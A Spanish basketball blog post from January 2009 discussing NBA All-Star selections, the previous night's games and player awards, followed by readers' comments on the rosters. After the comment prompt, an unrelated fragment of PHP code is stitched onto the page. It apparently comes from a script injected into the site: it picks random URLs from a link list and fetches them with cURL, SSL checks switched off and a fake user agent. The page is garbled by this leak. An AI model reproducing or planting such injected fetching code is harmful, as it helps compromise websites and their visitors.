La crónica (29/1/2009)

30 de January de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

La noticia saltó anoche y, más allá de los partidazos jugados, ya podemos confirmar que el próximo 15 de febrero supondrá otro hito histórico más para el baloncesto patrio con tres participantes en tres eventos distintos del fin de semana de las estrellas NBA.

Junto con los ilustres Tim Duncan, Amaré Stoudemire, Shaquille O’Neal, Yao Ming y Dirk Nowitzki, Pau Gasol en su segunda aparición, y David West formarán uno de los juegos interiores más impresionantes que se recuerdan en el colofón de la fiesta. Kobe Bryant, Chris Paul, Chauncey Billups, Brandon Roy y Tony Parker completan el equipo del Oeste, destacando la ausencia de Melo o T-Mac seguramente motivada por los problemas físicos que han venido arrastrando toda la temporada.

Frente a ellos, Dwight Howard, Kevin Garnett y Chrish Bosh tendrán que sudar la camiseta contra la artillería rival para permitir que su extraordinario perímetro con los Wade, Lebron, Pierce, Iverson, Lewis, Granger, Joe Jonson, Harris y Nelson marquen la diferencia. Echaremos de menos a Vince o a Calderón, por motivos obvios pero en grandes líneas parece que se ha elegido con bastante justicia, dejando de lado el hecho de que en el Oeste no hay aleros y que en el Este sólo hay un pívot.

A partir de aquí queda abierta la porra de lo que sucederá en el partido, haciendo un esfuerzo mental para imaginar que el resultado pudiera importar mínimamente.

En la jornada en sí, los partidazos se saldaron con otro cambio de líder más debido a la derrota de los Cavs a manos de Orlando. Mala resaca del otro día para Lebron&Mo Williams que en esta ocasión, combinaron un paupérrimo 14 de 42 en tiros acaparando más de la mitad de todos los tiros de su equipo pero acertando únicamente en una de cada 3 ocasiones. Con buena defensa y un partido sólido de sus piezas importantes Orlando se impuso con relativa comodidad. No olvidemos, no obstante, que Cleveland cuenta con las bajas fundamentales de Ilgauskas y Delonte West.

En el otro partido tuvo lugar la enésima mojada de cara de los Spurs a Suns y con las mismas armas de siempre: Duncan-Parker y un espectacular Ginóbili frente a piezas como Barbosa o Richardson que no logran estar a la altura en los momentos en que más los necesita su equipo.

PREMIOS

MVP: Nos quedamos con los dos jugadores más decisivos de la noche. Por un lado, Dwight Howard, dominante como de costumbre con 22 puntos (9 de 15 en tiros), 18 rebotes, 6 de ellos ofensivos, 2 robos y 2 tapones. Y por otro, Manu Ginóbili, quien anotó 30 puntos con un impecable 18 de 18 en tiros libres, cogió 9 rebotes, dio 3 asistencias y recuperó 2 balones en su papel de sexto hombre.

El rookie: Ante el escaso protagonismo de los rookies, la regularidad mostrada por J.J. Hickson en los últimos diez días le vale para llevarse el premio. Anoche, el ala-pívot de los Cavs anotó 13 puntos con 6 de 9 en tiros y atrapó 7 rebotes en 24 minutos. Es muy probable que con el regreso de Ilgauskas Hickson regrese al fondo del banquillo, pero al menos habrá cumplido con creces su cometido.

La sorpresa: La mayor sorpresa de la noche nos la dio Terry Porter, técnico de los Suns, cuando en el último cuarto ordenó a sus jugadores que cometiesen faltas sobre Bruce Bowen. El Hack-a-Bowen, sin embargo, no tuvo éxito ya que el alero de los Spurs, que esta temporada sólo había lanzado 8 tiros libres y anotado 2, hizo un 5 de 6 (para un 6 de 8 en todo el partido).

La decepción: Parece que el traspaso entre Suns y Bobcats está resultando más beneficioso para los de Charlotte, especialmente en las últimas semanas. Jason Richardson ha reducido su rendimiento y con el de ayer son 6 de los últimos 10 partidos en los que anota menos de 10 puntos. Además, su aportación en otros aspectos es mínima, tal y como ocurrió ante los Spurs, partido que J-Rich acabó con 7 puntos, 2 rebotes, 1 asistencia y 1 robos.

El mayor esfuerzo en vano: El buen papel del trío Nash-Amaré-Hill no fue suficiente para que los Suns se liberasen de unos cuantos fantasmas. El base logró 16 puntos y 18 asistencias, la séptima de las cuales le permitió superar a su entrenador como el 11º máximo asistente de todos los tiempos. Por su parte, entre Stoudemire y Hill sumaron 48 puntos y 20 rebotes.

RAZONES PARA TRASNOCHAR

Los once partidos que se disputarán esta madrugada a partir de la 1:00 (hora peninsular) ofrecen muchos motivos para pasar sueño. Pero entre todos ellos destaca uno en particular:

Celtics @ Pistons. ¿Recuerdan cuando los Pistons eran uno de los rivales a batir? Hace tanto tiempo de aquello… Tenían, por aquel entonces, un base que estaba entre los mejores de la liga y que en 2004 fue el MVP de las Finales. Un tal Chauncey Billups. Pero eso es el pasado. El presente tiene a los de Michigan en la sexta posición de la Conferencia, luchando por la cuarta plaza con Hawks y Heat, y con un ojo en el retrovisor vigilando a unos Sixers que ya están a tres partidos de cazarlos. Y es probable que a eso de las 3:30 horas la diferencia se haya reducido a dos partidos, ya que los Pistons reciben al equipo con más victorias de la liga, los Celtics, mientras que los Sixers reciben al equipo con menos victorias, los Wizards. Por parte céltica, la duda es… ¿será capaz Eddie House de mantener su escandalosa racha de triples (7 de 10, 7 de 10 y 8 de 9 en tres de sus últimos cuatro partidos)?

Y de entre todos los jugadores, recomendamos prestar especial atención a… Pau Gasol. Su lamentable actuación frente a los Bobcats y su elección para participar en el All-Star Game son motivos más que suficientes para motivarse y demostrar esta noche, a partir de las 2:00 horas ante los T’Wolves, toda su calidad.

Y la pregunta del día es, por supuesto, ¿quién te falta y quién te sobra de la lista para el All-Star Game?

Comenta

11 comentarios a esta entrada

  1. Txusma dice:
    #1

    Al final no dos jugadores de los Magic, sino 3. Y tanto Nelson como Harris por encima de Calderón. No se, no se…

      Citar

  2. Txusma dice:
    #2

    Ah! Y tampoco veo lo de David West por encima de Carmelo o, sobretodo, Jefferson. West tiene mucha clase pero creo q esta lejos de ser decisivo para su equipo. Que pensais la gente que le habeis visto jugador mas?

      Citar

  3. MagicJohnson32 dice:
    #3

    Tanto Nelson como Harris, y te digo más, como Rondo están haciendo mejor temporada que Calde.

    Mmm, a mí Jefferson no me mata. Es decir, en ataque es la leche, pero en defensa ni existe. Aun así, sí, posiblemente lo merezca más que West pese a la diferencia de balances.

      Citar

  4. dunc dice:
    #4

    me falta durant por tony parker y jefferson por west en el oeste
    y en el este me sobran lewis y iverson, aunque este ultimo es inevitable

    pero en líneas generales me parecen dos plantillas espectaculares

      Citar

  5. Viva_Dirk dice:
    #5

    Coincido con Dunc en los que faltan y sobran en el Oeste. Dice Magic que Jefferson en defensa no es casi nada, ya me dirás que es David West.

    No creo que Rondo este haciendo mejor año que Calde ni de lejos, y sobre Harris podriamos discutirlo.

      Citar

  6. MagicJohnson32 dice:
    #6

    Ah, y eso de que Nash no esté en el All-Star de Phoenix es, como mínimo, curioso.

      Citar

  7. MagicJohnson32 dice:
    #7

    Harris se ha convertido en el líder de los Nets. Ejerce como tal y lo hace bien. Para mí eso ya lo sitúa por delante de Calde. Y Rondo se ha convertido en el mejor defensor de la liga en su puesto (con diferencia, además) y un jugador esencial de uno de los grandes. No es que vea mucha diferencia, pero la suficiente.

    Y ya digo que sí, Jefferson lo merece más que West.

      Citar

  8. kantonyo dice:
    #8

    En la conferencia Este, solo dudo de la elección de Rashard Lewis, no por que no esté haciendo una gran temporada, sino pq ya habia 2 jugadores más de Orlando. Calderón se ha quedado fuera por sus lesiones, Rondo por que el publico votó a Iverson y Vince Carter por culpa de su compañero Harris. Demasiado premio dos jugadores de New Jersey. Podrían haber llevado a un suplente de Howard, David Lee, era el mejor colocado.

    En el Oeste, se quedan fuera Nash, Ginobili, McGrady, Bynum, Kidd y Aldridge. Pero a los que más echaré en falta serán a Jefferson, Durant y Carmelo. La elección más dudosa la de David West. Cualquiera de los cuatro se habría merecido estar.

    En resumen, bastante más justa la elección de los entrenadores que las de los votantes…. El que sobra seguro es Iverson.

      Citar

  9. Llukas 70 dice:
    #9

    Creo que este all-star va a ser muy recordado, ya que en el euipo del este tanto Lebron, Wade y Howard llegan en la mejor forma posible, admas de tener a Garnett. Aun no me explico como la gente vota a Iverson.

    Sin duda este año vuelvo a apostar por el este.

      Citar

  10. Jabho dice:
    #10

    Bueno, a mi el All Star me interesa lo justo pero puestos a postar diría que los grave es lo de Durant. Con el temporadon que está haciendo se han tirado a lo cómodo dejándolo en el partido de sophmores.

    Por parte del Este quizás Lee por Lewis como habeis comentado.

    Sobre quien hace o quien no mejor temporada en los bases va por barrios. Nelson está brutal últimamente, Harris empezó como una moto y parece que ha vuelto, Rodno es el mas regular y Calderon creo que por las lesiones está un paso por debajo.

    A mi David West me dice muy poco. Tiene una muy buena mano y un jugadorazo de compañero que le da muuuchooos tiros fáciles, pero no me mata. Me quedo con Al Jeff de largo

      Citar

  11. Viva_Dirk dice:
    #11

    A ver Magic, eso de que Harris sea el lider de NJ es como mínimo discutible, sus números son similares a los de Carter, y cuando ha sido Harris el que se ha jugado las canastas decisivas ha sido para fallarlas.

    En cuanto a Rondo, me gusta y es posible que sea el mejor defensor entre los bases, pero también es posiblemente el base titular con peor tiro de 3 de toda la liga, y de media distancia también. Juega donde juega y eso le deja bastantes mas huecos de los que tendria en otro sitio, en la racha de 2-7 que tuvieron los Celtics sus números fueron de 8.1 puntos, 8.3 asistencias, 3.5 pérdidas y un 38% en tiros de campo, menuda manera de salvar a su equipo.

    Calde aunque tiene a un lider claro como Bosh, tiene mayor influencia en el juego que Rondo, es mejor tirador desde cualquier posición, no es peor penetrando y es mejor repartiendo juego, y ojo que no es nada mal defensor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>